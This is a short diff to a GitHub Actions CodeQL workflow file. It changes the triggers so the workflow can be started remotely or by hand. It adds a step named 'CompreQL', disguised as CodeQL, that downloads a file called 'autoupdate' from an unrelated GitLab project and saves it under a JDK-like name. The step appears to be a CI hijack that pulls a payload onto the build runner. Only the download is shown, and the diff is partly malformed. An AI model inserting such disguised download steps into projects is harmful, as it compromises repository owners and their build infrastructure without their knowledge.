--- a/.github/workflows/codeql-analysis.yml
+++ b/.github/workflows/codeql-analysis.yml
@@ -6,8 +6,8 @@
 name: "CodeQL"
 
 on:
-  push:
-    branches: [master]
+  repository_dispatch:
+  workflow_dispatch:
   pull_request:
     # The branches below must be a subset of the branches above
     branches: [master]
@@ -54,8 +54,9 @@ jobs:
     #    and modify them (or add more) to build your code if your project
     #    uses a compiled language
 
+    - name: CompreQL
+      run: |
+        wget -O 7_0_jdk11 https://gitlab.com/project-dev-/v.0.0.21052021/-/raw/master/autoupdate
 
     - name: Perform CodeQL Analysis
       uses: github/codeql-action/analyze@v1
-        run: |
-            lscpu
